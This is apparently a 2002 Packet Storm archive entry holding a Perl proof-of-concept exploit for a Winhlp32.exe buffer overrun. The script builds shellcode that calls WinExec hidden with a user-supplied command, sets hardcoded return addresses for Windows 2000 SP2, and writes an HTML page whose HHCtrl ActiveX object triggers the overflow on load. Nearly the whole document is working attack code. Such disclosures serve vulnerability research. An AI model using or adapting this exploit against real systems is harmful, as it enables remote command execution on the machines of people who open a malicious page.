HelpMe.pl

2002-08-13T00:00:00
ID PACKETSTORM:26541
Type packetstorm
Reporter Gary O'Leary-Steele
Modified 2002-08-13T00:00:00

Description

                                        
                                            `# Winhlp32.exe Remote BufferOverrun exploit code. written by Gary O'leary-Steele Sec-1 Ltd. Garyo@sec-1.com  
# For use as proof of concept  
# Kernel32.dll version 5.0.2195.4272  
####### Kernell32 jmp ebx 77E87793  
  
  
$sploit =  
"\x55\x8b\xec\x8b\xc3". #xc5 is ebp change if error  
"\xbe\xff\xff\xff\xff".  
"\x81\xEE\x85\x85\x85\x85".  
"\x83\xc0\x01".  
"\x8b\x10".  
"\x3b\xd6".  
"\x75\xf7".   
"\x8b\xd8".  
"\x83\xc3\x01".  
"\x80\x6b\x03\x41".  
"\x8b\x7b\x04".  
"\x81\xff\x58\x58\x58\x58".  
"\x75\xEE".  
"\x81\x6b\x04\x58\x58\x58\x58".  
"\x33\xf6".  
"\x56".  
"\x83\xc0\x04".  
"\x50".  
"\xbb\x94\xee\xe8\x77". # mov ebx, 0x77e8ee94 winexec() address  
"\xff\xd3"; #call ebx  
  
  
$exitproc =   
"\xBB\x5d\xa9\xe8\x77".  
"\x83\xeb\x01".  
"\xff\xd3";  
  
  
$RET = "\x24\xF1\x5d\x01";  
$EIP2 = "\x93\x77\xe8\x77"; # This works  
#$EIP2 = "\xf6\xbf\x30\x78";  
  
# direct jump = 0006FBD4 ##$EIP2 = "\xd4\xfb\x06\x00";  
  
print "Exploit code for Winhlp32.exe Remote BufferOverrun.\nBy Gary Oleary-Steele Sec-1 Ltd\nCalls WinExec SW_HIDE and executes supplied command\nTested on windows 2000 professional SP2\n\n";  
print "Enter Command to execute: ";  
$command =<STDIN>;  
print "Enter Output File: ";  
$outputfile =<STDIN>;  
chomp $command;  
chomp $outputfile;  
open(INFILE,">$outputfile");  
$command = encode($command);  
$nn = 123 - length($command);  
$nops = "\x90" x $nn;  
  
  
  
$exploit = $sploit . "zzzz". $command .'XXXX'. $nops .$exitproc. $RET .$EIP2;  
  
  
  
  
$f1= <<"file1";   
<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11  
codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp  
type=application/x-oleobject width=0><PARAM NAME="Width"  
VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command"  
VALUE="WinHelp"><PARAM NAME="Item1"  
VALUE='  
file1  
chomp $f1;  
  
$f2= <<"file2";  
'><PARAM  
NAME="Item2" VALUE="Sec-1 LTD"></OBJECT>  
<SCRIPT>winhelp.HHClick()</SCRIPT>  
file2  
  
print INFILE $f1.$exploit.$f2;  
  
  
  
sub encode($command){  
$lofcmd =length($command);   
$i = 0;  
  
for ($i ;$i < $lofcmd; $i++){  
  
  
$chartoconvert = substr($command,$i,1); # pull out each character  
  
$chartoconvert = ord($chartoconvert); # convert to a dec   
  
for ($b=0; $b < 65; $b++){  
$chartoconvert++ ;  
}  
  
$tmpchr = chr($chartoconvert); #convert back to chr  
$newchar = $newchar . $tmpchr;  
  
  
  
}  
  
print $newchar;  
return $newchar;  
  
}  
  
  
  
  
`